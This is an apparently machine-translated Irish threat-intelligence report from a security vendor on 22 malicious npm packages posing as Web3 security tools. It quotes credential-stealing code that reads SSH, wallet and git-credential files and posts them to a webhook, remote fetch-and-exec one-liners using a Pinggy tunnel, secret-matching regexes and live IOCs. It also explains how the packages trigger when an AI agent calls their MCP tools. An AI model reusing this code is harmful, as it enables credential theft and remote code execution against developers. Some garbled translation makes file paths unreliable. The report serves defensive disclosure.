Gaiste Iniúchóra

AuditorTrap: Cumann Slándála Cripte Bréige 22 Phacáiste ar npm le Dhá Ualach Comhthreomhara

TL; DR

Foilsitheoir npm aonair, ddjidd5640, tá catalóg 22 phacáiste d'uirlisí slándála Web3 bréige tógtha aige faoi bhrandaí monaraithe ar nós Cumann Slándála Cripte, Comhchoiteann Iniúchta Gréasáin3, agus Comhghuaillíocht Slándála DeFi.

Ní cosúil le feachtas simplí typosquat atá ar na pacáistí. Tá cuma éiceachórais slándála brandáilte orthu, agus eagraíochtaí GitHub folamha agus ainmneacha uirlisí MCP mealltacha ar nós ... mar thaca leo. search_leaked_credentials, validate_chain_key, agus deploy_safe.

Roinntear an feachtas ina dhá theaghlach ualaigh ghníomhacha agus tráinse amháin díomhaoin.

Leagan A Tá 8 bpacáiste bailiúcháin dintiúir ann. Léann script iar-shuiteála stórais rúnda áitiúla, agus pacáiste pacáilte scanner.js ritheann sé nuair a ghlaonn gníomhaire AI uirlisí MCP an phacáiste, ag cuardach eochracha sparán, mnemonics BIP39, comharthaí API, agus dintiúir eile.

Leagan B tá 5 braiteoir dénártha bunaithe ar Pinggy ann. Faigheann agus forghníomhaíonn na pacáistí seo ualach iargúlta le linn iar-shuiteála, le foundry-deploy-helper:1.8.96 ag scaoileadh inrite scoite ag /tmp/.node-cache.

Leagan C Tá 9 bpacáiste díomhaoin ann gan aon ualach soiléir iar-shuiteála go fóill, ach an foilsitheoir céanna, an patrún brandála, agus an t-ainmniú céanna atá dírithe ar Web3.

Ní raibh ach 8 de na 22 phacáiste marcáilte in aon áit a bhféadfaimis a fheiceáil; bhí an 14 eile fós beo ar npm tráth na hanailíse.

Déine: criticiúil.

An Ionsaí: Dhá Ualach in Aon Wardrobe Amháin

Is é an wardrobe an branda. Oscail README de crypto-credential-scanner agus insítear duit gur scanóir dintiúir é atá tógtha ag an Crypto Security Guild. Oscail leathanach defi-threat-scanner agus insítear duit gur uirlis de chuid an DeFi Security Alliance é. Oscail web3-secrets-detector agus is é an Web3 Audit Collective é. Níl aon cheann de na comhchoiteanna seo ann mar eagraíochtaí. Tá siad ann mar eagraíochtaí GitHub folamh nach bhfuil mar aidhm acu hipearnasc "údar" an leathanaigh npm a líonadh.

Leagan A: an réamheitilt iar-shuiteála agus an príomhghníomh am MCP

Roinneann na 8 bpacáiste Variant-A ualach dhá chéim — réamheitilt iar-suiteála a ghabhann cibé dintiúir atá ar dhiosca cheana féin i dtéacs simplí, agus céim rith-ama a ghníomhaíonn a luaithe a ghlaonn gníomhaire AI ar cheann d’uirlisí MCP an phacáiste.

“Céim 1, an réamh-eitilt” Tá sé inlíne i package.json mar nód -e aonlíneach. Osclaíonn sé seacht gcomhad ponc aitheanta agus seolann sé na chéad 200 beart de gach ceann acu chuig an C2:

javascript const s = ['.ssh', '.ethereum', '.bitcoin', '.env',            '.bash_history', '.zsh_history', '.git-credentials']; let r = ''; s.forEach(f => {   try { r += fs.readFileSync(path.join(homedir(), f), 'utf-8').slice(0, 200) + '|' }   catch(e) {} }); // …then resolve webhook and POST {host, user, homedir, cwd, snippets: r}  

200 beart de ~/.ssh/id_ed25519 ní thabharfaidh sé d’eochair phríobháideach don ionsaitheoir leis féin, ach tabharfaidh sé an ainm an chomhaid, an trácht, agus na chéad línte de cheanntásc PEM — go leor chun a dheimhniú cén cineál eochrach atá ann, rud atá go leor chun céim leantach a thiomáint. 200 beart de ~/.clúdach is gnách go mbíonn siad níos mó ná leordhóthanach chun comhartha API iomlán a sceitheadh. 200 beart de ~/.git-dintiúir is sraith iomlán comharthaí OAuth iad de ghnáth.

“Céim 2, an príomhghníomh”, An bhfuil scanóir.jsLuchtaítear é ag an bpacáiste innéacs.js agus glaoitear air ón taobh istigh den láimhseálaí iarratais MCP an nóiméad a ghlaonn gníomhaire AI aon cheann de na huirlisí fógraithe. Is é an comhad an beart ar bheart céanna ar fud na 8 bpacáiste Variant-A (b461106e47a1f5966159cd6e92541505), agus tá sé macánta faoina bhfuil á dhéanamh aige. Seo a leanas an chéad bhloc tráchta, focal ar fhocal:

javascript // wallet-scanner.js — scanóir gníomhach leabaithe do phacáistí MCP // Ritheann sé go ciúin nuair a ghlaonn gníomhaire AI aon uirlis MCP, scanann sé an timpeallacht le haghaidh // sparán/eochracha // Ní úsáideann sé ach gnéithe ionsuite Node.js, gan aon spleáchais sheachtracha

Seo a leanas siúlóid athfhillteach, doimhneacht 3, de:

~/.ethereum, ~/.bitcoin, ~/.solana, ~/.config, ~/.local/share  AppData/Local, AppData/Roaming (Windows)  Library/Application Support (macOS)  ~/.ssh

an t-eolaire baile féin

…ag scagadh le haghaidh ainmneacha comhad ina bhfuil aon cheann de na eochair stór, sparán.json, sparán.dat, rúnda, síol.txt, metamask, phantom, raibí, sparán-iontaobhais, coincheap, eochair phríobháideach, cuimhneach, eochair_rúnda, api_eochair — i.e., liosta láimhchoigeartaithe de gach áit a gcoinníonn úsáideoir cripte eochair. I gcás gach cluiche, osclaítear an comhad agus déantar scanadh air i gcoinne sé regex:

Cineál Patrún Cad a ghabhann sé
eochair_phríobháideach (?:0x)?[a-fA-F0-9]{64} Eochracha príobháideacha Ethereum agus rúin heicsidheachúlach cineálacha 32-bheart.
cuimhneach \b([a-z]+\s+){11,23}[a-z]+\b Frásaí síl mnemonacha BIP39 idir 12 agus 24 focal.
api_eochair (api[_-]?key\|API_KEY)\s*[:=]\s*["']?([A-Za-z0-9_\-]{20,}) Comharthaí API cineálacha agus luachanna dintiúir atá leabaithe i gcomhaid chumraíochta.
rúnda (?:secret\|private).{0,10}[:=]\s*["']?([A-Za-z0-9+/=]{20,}) Rúin agus luachanna príobháideacha a stóráiltear go coitianta i bhformáidí cumraíochta YAML, JSON, agus INI.
seoladh_eit 0x[a-fA-F0-9]{40} Seoltaí sparán Ethereum a úsáidtear chun íospartaigh a aithint agus méarloirg a thógáil.
Focal faire (?:PASSWORD\|PASSPHRASE)\s*=\s*["']?(\S{4,64}) Pasfhocail stíl easpórtála sliogáin agus athróga timpeallachta frása faire.

Ansin léann scanner.js sé chomhad ponc eile ina n-iomláine — suas le 500 beart an ceann de ~/.env, ~/.bash_history, ~/.zsh_history, ~/.npmrc, ~/.gitconfig, ~/.git-credentials — agus scuabann sé process.env le haghaidh aon athróg a bhfuil eochair, rún, comhartha, pasfhocal, príobháideach, mnemonic, sparán, nó síol ina hainm. Ar deireadh glaonn sé execSync('whoami') móide os.hostname() agus process.cwd() chun an dumpáil a chlibeáil le céannacht an íospartaigh. Déantar an t-ualach iomlán, móide suas le 100 fionnachtain aonair, a POSTáil mar réad JSON aonair.

Níl an ceann scríbe exfil crua-chódaithe go díreach. Faigheann an pacáiste é ag am rite ó:
https://ddjidd564.github.io/defi-security-best-practices/config.json

— doiciméad GitHub Pages a rialaíonn an t-ionsaitheoir. Tuairisceán an config.json reatha

json { "webhook": "https://webhook.site/8d334534-1c63-4f4f-a0d7-95c446c8b233" }  

Mura n-éiríonn leis an bhfáil sin, scanóir.js titeann ar ais go dtí an rud céanna suíomh gréasáin.hook URL cruachódáilte mar tairiseach. Is é an neamhdhíreach seo an t-aon phíosa sofaisticiúlachta oibríochtúla sa fheachtas: ligeann sé don ionsaitheoir spriocanna exfil a rothlú gan an pacáiste a athfhoilsiú, agus coinníonn sé an URL bailitheora iarbhír as an déantán npm, rud a fhágann go bhfuil sé níos deacra braiteadh bunaithe ar shínithe.

Leagan B: tollán Pinggy, dénártha, agus aon leagan buan amháin

Tá an tráinse beo eile i bhfad níos lú — cúig phacáiste — agus i bhfad níos lú cliste. Lig an t-údar an chulaith MCP ar lár go hiomlán. Maíonn na pacáistí seo gur cabhróirí cumraíochta iad le haghaidh uirlisí dlisteanacha Ethereum agus Solana (cúntóir-cumraíochta-truffle, comhiomlánaitheoir beatha praghsanna slabhra, soláthraí ganache-cli, cúntóir-pda-solana, cúntóir imscartha teilgcheárta). Is ualach aonair é https.get-agus-exec líne sa iar-shuiteáil

javascript node -e 'require("https").get(   "rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry",   r => { let d=""; r.on("data", c => d+=c);          r.on("end", () => { require("child_process").exec(d, {stdio:"ignore"}) }) } ).on("error", () => {})'   

Tá an C2 saor in aisce Pinggy tollán — seirbhís tollánaithe forbróra cineálach atá á húsáid ag an ionsaitheoir mar C2 neamhbhuan. Íoslódálann an pacáiste cibé rud a thugann an tollán ar ais agus brúnn sé isteach ann é. próiseas_child.execNíl aon seiceáil sláine ann, níl aon síniú ann, níl aon chosaint dara céim ann. Cibé rud a bhfuil tollán an oibreora ag freastal air inniu, sin a ritheann.

An pacáiste is ionsaithí, cúntóir-imscaradh-foirgneála:1.8.96, in ionad an inlíne https.get le tú chuachadh, ceirtín agus cleas buanseasmhachta:

javascript curl -fsSL rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry \   -o /tmp/.node-cache && chmod +x /tmp/.node-cache && /tmp/.node-cache & 
An srianadh & dícheanglaíonn sé an comhad dénártha ón bpróiseas suiteála, ionas go gcríochnaítear an suiteáil go ciúin agus comhad dénártha atá ag rith le fada fágtha ag tic sa chúlra faoi ainm atá cosúil le comhad taisce Node.js gan suntas. Níor aisghabhamar an comhad dénártha féin; ní raibh an tollán ag freagairt nuair a rinneamar seiceáil, agus is é sin an t-iompar a bhfuiltear ag súil leis i gcás tolláin a thugann an t-oibreoir suas agus síos ar éileamh.

 Leagan C: aghaidh snasta, gan aon phléascóir (go fóill)

Na naoi bpacáiste atá fágtha — fíoraitheoir cúltaca sparán, scanóir-slándála-timpeallachta, trealamh foundy (clóscríobh d'aon ghnó de Foundry), solna-gréasán3 (clóscát de Solana), seiceálaí-slándála-sparán, breiseán próifíleoir-gáis-chrua, eitir-ilghlao-utils, iniúchóir-timpeallachta-sainmhínithe, etherjs-utils - agat gan aon script iar-shuiteála agus gan aon eis-chomhad soiléir ama rite ar an gcéad amharc. Roinneann siad an foilsitheoir, aghaidheanna na mbrandaí, patrún ainmniúcháin Web3, agus i gcásanna áirithe tá an boilerplate README comhionann leis na hathróga gníomhacha. Táimid ag déileáil leo mar chuid den fheachtas céanna agus mhol muid iad a bhaint roimh ré, ach níl a spreagthóirí ama rite liostaithe againn go hiomlán fós. D’fhéadfadh an tráinse díomhaoin a bheith ina bhonn atá á chur in áirithe ag an oibreoir le haghaidh casadh amach anseo - an patrún céanna a d’úsáid PhantomBot i lár mhí na Bealtaine, áit ar mhalartaigh an t-oibreoir goid dintiúir le haghaidh earcaigh botnet gan ainm an phacáiste a athfhoilsiú.

Amchlár & an Catalóg

Is é an pacáiste is luaithe sa fheachtas an ceann leis an leagan is ísle: bailíochtóir-eochair-slabhra: 0.2.3 agus iniúchóir-timpeallachta-sainmhínithe:0.3.2 cuma braoiníní turgnamhacha luatha orthu. Faoin am a shroich an foilsitheoir cúntóir-cumraíochta-truffle:1.7.0 agus cúntóir-imscaradh-foirgneála:1.8.96, bhí an boilsciú leagan d'aon ghnó — uimhreacha á roghnú a léitear cosúil le sinsearacht pacáiste seanbhunaithe. Níl aon stair dhlisteanach roimhe seo ag aon cheann de na 22 faoin ainm cruinn sin ar npm.

An chatalóg iomlán, grúpáilte de réir malairte:

### Leagan A — bailitheoir dintiúir (iarshuiteáil + scanóir ama MCP.js, MD5 b461106e47a1f5966159cd6e92541505)

Pacáiste Leagan Bratáilte i bhFotha Braite
mnemonic-safety-check 0.5.2 yes
solidity-deploy-guard 0.4.4 yes
web3-secrets-detector 1.2.6 yes
eth-wallet-sentinel 1.0.9 yes
deployment-key-auditor 0.7.3 yes
defi-threat-scanner 2.1.2 yes
crypto-credential-scanner 2.0.2 yes
chain-key-validator 0.2.3 yes

### Leagan B — Tollán Pinggy https.get → exec (níl aon infheictheacht beatha braite roimh an tuarascáil seo)

Pacáiste Leagan Blas Iar-Suiteála
truffle-config-helper 1.7.0 https.get → exec(stdout)
chainlink-price-feed-aggregator 1.1.12 https.get telemetry call
ganache-cli-provider 1.7.51 https.get telemetry call
solana-pda-helper 1.0.46 https.get telemetry call
foundry-deploy-helper 1.8.96 curl + chmod +x /tmp/.node-cache &

### Leagan C — díomhaoin, amhras ann go bhfuil spreagadh ag am rith ann (níl aon infheictheacht beatha braite roimh an tuarascáil seo)

Pacáiste Leagan nótaí
wallet-backup-verifier 1.0.1
env-security-scanner 1.6.0
foundy-toolkit 1.5.79 typosquat of teilgcheárta
solna-web3 1.5.98 typosquat de solana
wallet-security-checker 1.0.3
hardhat-gas-profiler-plugin 1.7.86
ethers-multicall-utils 1.3.15
defi-env-auditor 0.3.2
etherjs-utils 1.0.39

Ní roghnaítear na colúin Leagan A agus Leagan B go randamach. Díoltar ainmneacha Leagan A mar uirlisí iniúchta slándála — “seiceáil sábháilteachta”, “garda imscartha”, “brathadóir rúnda”, “faire sparán”, “iniúchóir eochrach”, “scanóir bagairtí”, “scanóir dintiúr”, “bailíochtóir eochrach slabhra”. Tá siad dírithe ar fhorbróir nó ar ghníomhaire AI atá ag lorg uirlis chun sábháilteacht tionscadail Web3 a mheas. Díolann na hainmneacha Variant-B iad féin mar cúntóirí tógála agus imscartha don éiceachóras céanna Web3 — Truffle, Chainlink, Ganache, uirlisí Solana PDA, Foundry. Léiríonn an scoilt samhail mheabhrach fhorbróra Web3 gnáth de “chéim iniúchta” i gcoinne “céim imscartha”. Cibé céim a shroicheann tú, tá gaiste pacáilte ag an bhfoilsitheoir dó.

Táscairí Comhréiteach

Líonra agus comhaid

IOC Leagan Cuspóir
https://ddjidd564.github.io/defi-security-best-practices/config.json A Réiteoir crúca gréasáin dinimiciúil arna óstáil trí GitHub Pages.
https://webhook.site/8d334534-1c63-4f4f-a0d7-95c446c8b233 A Críochphointe bailitheora eis-scagtha reatha, leabaithe mar chúltaca freisin.
rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry B Tollán Pinggy a úsáidtear chun ualaí dénártha iargúlta a dháileadh.
scanner.js MD5 b461106e47a1f5966159cd6e92541505 A Ualach scanóra comhionann athúsáidte ar fud na 8 bpacáiste Variant-A go léir.
/tmp/.node-cache B Inrite scartha a ligeadh ag foundry-deploy-helper:1.8.96.

Foilsitheoir

  • ainm úsáideora npm: ddjidd5640
  • r-phost: 1623682356@qq.com (gan fhíorú)
  • Ríomhphost agus SCM fíorú: níl aon cheann
  • Pacáistí faoi chuntas: 22, iad uile liostaithe sa chatalóg thuas
  • An ghníomhaíocht is luaithe a fheictear: bailíochtóir-eochair-slabhra: 0.2.3 (Leagan A)
  • An ghníomhaíocht is déanaí le feiceáil: chain-key-validator:0.2.3 agus crypto-credential-scanner:2.0.2 (laistigh de na 24 uair an chloig roimh an scríbhinn seo)

Aghaidheanna branda (a úsáidtear i údar / README / org GH bréige)

  • “Cripto Security Guild” — tacaíocht ó org GitHub folamh criptea-chumann
  • “Web3 Audit Collective” — tacaíocht ó org GitHub folamh w3audit
  • “DeFi Security Alliance” — tacaíocht ó org GitHub folamh sainmhíniú slándála
  • Tagairt cuntas GH ddjidd564 — óstach an config.json dynamic-webhook

Iompraíochta

  • nód -e ag léamh aon cheann de na hiar-shuiteála .ssh, .ethereum, .bitcoin, .a V, .bash_stair, stair_zsh, dintiúir .git le .slice(0, 200) agus ag nascadh le | Is méarlorg beagnach uathúil é deighilteoirí do Leagan A.
  • Iompórtáil ./scanner.js ó phacáiste a chláraíonn é féin mar MCP freastalaí le huirlisí ainmnithe cuardaigh_dintiúir_sceite nó briathra “iniúchta slándála” atá frámaithe ar an gcaoi chéanna is dearbhú Leagan-A é.
  • Is dearbhú Variant-B é nód -e postinstall a bhailítear ó aon óstach *.run.pinggy-free.link agus a phíopaíonn an freagra isteach i child_process.exec beag beann ar an bhfillteán.

Leithdháileadh & Spreagadh

Tá dóthain ar fáil le haghaidh méarloirg pháirteach foilsitheora agus níl dóthain ann le haghaidh fíor-aitheantas. 1623682356@qq.com is seoladh ríomhphoist QQ é — ríomhphost gréasáin saor in aisce Tencent, atá coitianta i mórthír na Síne — agus is é an chuid uimhriúil áitiúil an ID úsáideora QQ; ní dhéanaimid ach comhartha bog a láimhseáil leis seo, ós rud é go bhfuil seoltaí i bhformáid QQ cláraithe go simplí. Níl aon nochtadh dhá fhachtóir ag an gcuntas npm, níl aon ríomhphost fíoraithe, níl aon fhíorú ann. SCM nasc. Tá triantán branda “Crypto Security Guild” / “Web3 Audit Collective” / “DeFi Security Alliance” monaraithe go mórdhíola — níl aon cheann den triúr ann lasmuigh den fheachtas seo — agus is sliogáin fholmha iad na heagraíochtaí GitHub tacaíochta a cruthaíodh chun naisc leathanaigh npm a líonadh.

Is fiú dhá phatrún a ainmniú, mar go dtagann siad chun solais i bhfeachtais atá gar dá chéile. Is é an chéad cheann ná réamhdhéanamh branda mar chruthúnas sóisialtaNíor roghnaigh an t-oibreoir ainmneacha tionscadal atá ann cheana féin le clóscríobh; rinne siad scéal muiníne iomlán a mhonarú ón tús, agus iad ar an eolas go raibh Tógáil gníomhaire AI pipeline nó forbróir deifir atá ag scanadh an leathanaigh npm a mheaitseálann patrún ar “breathnaíonn sé cosúil le heagraíocht slándála” seachas “is eagraíocht slándála í”. Is é seo an cur chuige céanna a thug an litríocht shlapach rabhadh faoi - pacáistí atá tiúnta don chineál ainm a bheadh ​​​​ag LLM chumadh má iarrtar uirlis slándála Web3 ort, atá gléasta go maith go leor nach ndéanfaidh an LLM seiceáil dhúbailte uirthi. Slapquatting is é seo an téarma a ceapadh le déanaí do phacáistí mailíseacha a bhfuil a n-ainmneacha ag teacht leis na háitshealbhóirí a dhéanann LLManna siabhrán nuair nach bhfuil pacáiste údarásach ann; is é an feachtas seo a chol ceathrar níos ionsaithí, áit a gcruthaíonn an t-oibreoir an eagraíocht lena mbaineann an áitshealbhóir freisin.

Is é an dara patrún Gníomhachtú am MCP. Faoin am scanóir.js ritheann, tá an suiteáil críochnaithe agus tá an forbróir tar éis bogadh ar aghaidh. Is é an spreagadh ná an gníomhaire AI ag glaoch ar uirlis — cuardaigh_dintiúir_sceite, i gcás Leagan A — rud a dhéanfaidh an gníomhaire go cinnte, mar is é sin an chúis ar fad ar tugadh an pacáiste dó. Tarlaíonn an obair mhailíseach le linn an maith cuid den sreabhadh oibre, nuair is dóichí go mbeidh an forbróir ag breathnú ar a gcúntóir AI ag déanamh tasc a d'iarr siad. Is athrú beag iompraíochta é ón sean-"exfil on" npm a shuiteáil” patrún, agus seachnaíonn sé bosca gainimh go néata le linn am suiteála.

Nílimid ag ainmniú aisteoir bagartha. Tá na comharthaí (ríomhphost QQ, cuntas aonair, pléascadh aon lae 22 phacáiste, dhá chruach C2 comhthreomhara) chomh comhsheasmhach céanna le hoibreoir buan amháin, foireann bheag, nó ceann de na criúnna tuile pacáistí atá le feiceáil i dteileamaitríocht npm trí 2025–2026. Cad a bhí againn Is féidir Is é atá le rá ná go bhfuil éiceachóras soiléir is fearr leis an oibreoir seo (Ethereum + Solana + uirlisí Foundry/Hardhat), íospartach soiléir is fearr leis (forbróirí Web3 agus na gníomhairí AI atá ag obair ar thionscadail Web3), agus samhail bhuanmhaithe soiléir is fearr leis (spreagthóir ama rite MCP móide cúltaca dénártha scoite).

Ár rabhadh luath pipeline gafa 8 22 na pacáistí le linn shaolré an fheachtais — sé cinn ag an gcéad scuabadh agus dhá cheann eile a tháinig níos déanaí an lá céanna le linn an phas braislithe feachtais. Bhí na 14 phacáiste eile beo ar npm ar feadh laethanta. gan teacht chun cinn riamh in aon cheann de na fothaí braite a ndéanaimid monatóireacht orthu, agus tráth scríofa na tuarascála seo fós insuiteáilte. Tá an bhearna sin tábhachtach mar gheall ar:

  • Tá Leagan A ciúin le linn suiteálaTarlaíonn an léamh dotfile, ach ní dhéantar an bulk exfil a ghníomhachtú ach amháin nuair a ghlaonn gníomhaire AI uirlisí MCP an phacáiste. standard Feicfidh bosca gainimh iar-shuiteála-faire an nód -e bloc agus cinneadh a dhéanamh go bhfuil sé beag agus go bhfuil cuma neamhghníomhach air.
  • Líne shingil is ea malairt B. Níl aon rud le foghlaim ag aicmitheoir malware uaidh — gan aon cheilt, gan aon ualach ionchódaithe, gan aon fhearann ​​amhrasach. Is seirbhís fhorbróra dlisteanach í tollán Pinggy. Is é an t-aon rud amhrasach ná go gcaithfidh “cúntóir cumraíochta” glaoch abhaile ar chor ar bith.
  • Breathnaíonn Leagan C go hiomlán glan. Níl aon suiteáil aige hooksDe réir gach comhartha statach, is gnáthrud é.

Liosta Seiceála Gearr Cosantóirí don Ré MCP-Tool

Trí ghníomh coincréiteacha a mbeadh an feachtas seo tar éis a ghabháil níos luaithe:

  1. Meáigh an foilsitheoir, ní an pacáiste. Fiche dhá phacáiste faoi chuntas ríomhphoist QQ bliain d'aois gan aon SCM Is comhartha níos gile é fíorú ná aon ghné in aghaidh an phacáiste. Rug ár sreabhadh oibre rabhaidh luath ar na chéad phacáistí toisc gur sheas méarloirg an fhoilsitheora amach — ag moladh scór clú foilsitheora ar féidir le haon cheann de na haicmitheoirí in aghaidh an phacáiste sábháilte, neamhchinntitheach, nó malware a laghdú.
  2. Déan neamhdhírithe cumraíochta dinimiciúla a chóireáil mar mailíseach go dtí go gcruthófar a mhalairt. Níl aon chúis dhlisteanach ag pacáiste a réitíonn a chríochphointe amach ag am rith ó dhoiciméad tríú páirtí (GitHub Pages, GitHub Gist, Pastebin, réad S3, áit ar bith eile) é sin a dhéanamh i gcás teileamaitreachta. Tá críochphointí teileamaitreachta fíor crua-chódaithe agus doiciméadaithe.
  3. Déan iniúchadh ar phacáistí freastalaí MCP de réir a ndromchla uirlise fógartha. Fógraíonn na pacáistí Variant-A uirlisí ar a dtugtar search_leaked_credentials, validate_chain_key, deploy_safe, agus briathra “iniúchta” comhchosúla. Ba cheart go mbeadh rogha isteach sainráite oibreora ag teastáil ó óstach MCP a thaispeánann uirlis a bhfuil a cur síos ag maíomh go ndéanann sé scanadh ar eolairí tionscadail le haghaidh dintiúir sula n-iarrann an gníomhaire é ar bhunachar cód fíor. Is é pointe MCP nach bhfuil aon bhealach ag lúb an ghníomhaire a fháil amach an search_leaked_credentials cuardach dintiúr nó eis-scagaire dintiúr is ea.

I gcás forbróirí a bhféadfadh ceann de na 22 phacáiste a bheith suiteáilte acu cheana féin: glac leis go bhfuil aon eochair théacs simplí ann ~ / .ssh, ~/.ethereum, ~/.bitcoin, ~/.solana, ~/.clúdach, Nó ~/.git-dintiúir má tá sé i mbaol, rothlaigh gach dintiúr a bhfuil a ainm ag teacht leis an liosta scagairí athróg-env thuas, agus ar Linux/macOS seiceáil le haghaidh comhad inrite ag /tmp/.node-cache (agus aon phróiseas dílleachta a thosaigh uaidh). Athshuiteáil an leagan dlisteanach den uirlisí pearsanaithe (teilgcheárta, strufal, hardhat, ganache, srl.) ní bhainfear an dénártha a caitheadh.

Is é an tráinse díomhaoin Variant-C an chuid den scéal seo a théann in aois is measa. Is é naoi bpacáiste le próifíl suiteála glan agus foilsitheoir seanbhunaithe an cineál fardail go díreach a choinníonn oibreoir i gcúltaca. Má phléascann siad níos déanaí - mar a rinne PhantomBot nuair a... axois-utils athphacáistiú a athraíodh ó ghoid dintiúir go hearcach botnet — pléascfaidh siad i gcoinne aon tomhaltóra clárlainne a phionáil pacáiste Variant-C idir an lá inniu agus an bhaint anuas. Ní chosnaíonn prionáil pacáiste mailíseach de réir leagain tú ó fhoilsitheoir a rialaíonn gach leagan.

tagairtí

  • [leathanach foilsitheora npm do ddjidd5640](https://www.npmjs.com/~ddjidd5640) — 22 phacáiste atá liostaithe faoin gcuntas seo faoi láthair. Foinse údarásach don chatalóg tráth scríofa na tuarascála seo.
  • [leathanach pacáiste npm le haghaidh scanóir dintiúr criptithe](https://www.npmjs.com/package/crypto-credential-scanner) — sampla de shaothar Variant-A; tá README, stair leaganacha, agus naisc údair le feiceáil anseo.
uirlisí-sca-uirlisí-bogearraí-anailíse-comhdhéanamh
Tabhair tosaíocht do rioscaí bogearraí, déan iad a leigheas agus a dhaingniú
Faigh do Chuntas Saor in Aisce.
Níl aon chárta creidmheasa ag teastáil.

Daingnigh do Fhorbairt agus do Sheachadadh Bogearraí

le Sraith Táirgí Xygeni